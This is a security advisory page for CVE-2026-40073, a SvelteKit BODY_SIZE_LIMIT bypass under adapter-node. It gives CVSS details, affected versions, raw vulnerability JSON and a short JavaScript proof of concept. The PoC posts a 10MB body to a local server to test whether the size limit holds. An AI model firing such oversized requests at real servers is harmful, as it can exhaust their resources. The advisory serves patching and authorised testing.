Security Vulnerability Report
CVE-2026-40073 CVSS 7.5 HIGH

CVE-2026-40073

Published: 2026-04-10 17:17:12
Last Modified: 2026-04-15 18:43:03

Description

SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.57.1, under certain circumstances, requests could bypass the BODY_SIZE_LIMIT on SvelteKit applications running with adapter-node. This bypass does not affect body size limits at other layers of the application stack, so limits enforced in the WAF, gateway, or at the platform level are unaffected. This vulnerability is fixed in 2.57.1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:svelte:kit:*:*:*:*:*:node.js:*:* - VULNERABLE
SvelteKit < 2.57.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
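// PoC for SvelteKit BODY_SIZE_LIMIT Bypass (CVE-2026-40073)
// This script attempts to send a request body larger than the configured limit.
// If the bypass works, the server accepts the payload instead of returning 413.
//
// Interpretation note: a 413 can be produced by a reverse proxy or platform
// limit in front of the application, and a non-413 status on its own is not
// proof of a bypass. The only conclusive check is to run the same request
// against the same deployment on a fixed SvelteKit (>= 2.57.1, per the
// description) with the same BODY_SIZE_LIMIT and compare the outcome.
const http = require('http');

const targetHost = 'localhost';
const targetPort = 3000;

// Assuming the limit is set to 1MB, sending 10MB
const largeBody = 'A'.repeat(10 * 1024 * 1024);

const options = {
  hostname: targetHost,
  port: targetPort,
  path: '/',
  method: 'POST',
  headers: {
    'Content-Type': 'text/plain',
    'Content-Length': Buffer.byteLength(largeBody),
    'Connection': 'close',
  },
};

const req = http.request(options, (res) => {
  console.log(`Status Code: ${res.statusCode}`);
  if (res.statusCode === 413) {
    // 413 may come from SvelteKit itself or from Nginx / the platform in
    // front of it; either way the oversized body was rejected.
    console.log('[-] Failed: Limit enforced correctly.');
  } else if (res.statusCode === 200 || res.statusCode === 500) {
    // 200/500 indicate the server went on to process the request, i.e. the
    // oversized body was not rejected up front. (The original check also
    // listed 413 here, which was unreachable after the branch above.)
    console.log('[+] Potential Bypass: Server processed the request or returned unexpected status.');
  } else {
    // Previously these fell through silently; report them so a run never
    // ends without a verdict.
    console.log(`[?] Inconclusive: unexpected status ${res.statusCode}; compare against a fixed deployment.`);
  }
  // Drain the response so the socket is released.
  res.resume();
});

req.on('error', (e) => {
  // If the server answers early (e.g. with 413) and closes the connection
  // before the 10MB write completes, the write itself can fail (EPIPE /
  // ECONNRESET). That outcome is consistent with the limit being enforced,
  // not with a bypass.
  console.error(`Request error: ${e.message}`);
});

req.write(largeBody);
req.end();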

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40073", "sourceIdentifier": "[email protected]", "published": "2026-04-10T17:17:12.357", "lastModified": "2026-04-15T18:43:03.123", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.57.1, under certain circumstances, requests could bypass the BODY_SIZE_LIMIT on SvelteKit applications running with adapter-node. This bypass does not affect body size limits at other layers of the application stack, so limits enforced in the WAF, gateway, or at the platform level are unaffected. This vulnerability is fixed in 2.57.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:svelte:kit:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2.57.1", "matchCriteriaId": "CC23CF52-37C9-4CA0-91A7-DF09E36C7886"}]}]}], "references": [{"url": "https://github.com/sveltejs/kit/commit/3202ed6c98f9e8d86bf0c4c7ad0f2e273e5e3b95", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/sveltejs/kit/releases/tag/@sveltejs/[email protected]", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/sveltejs/kit/security/advisories/GHSA-2crg-3p73-43xp", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}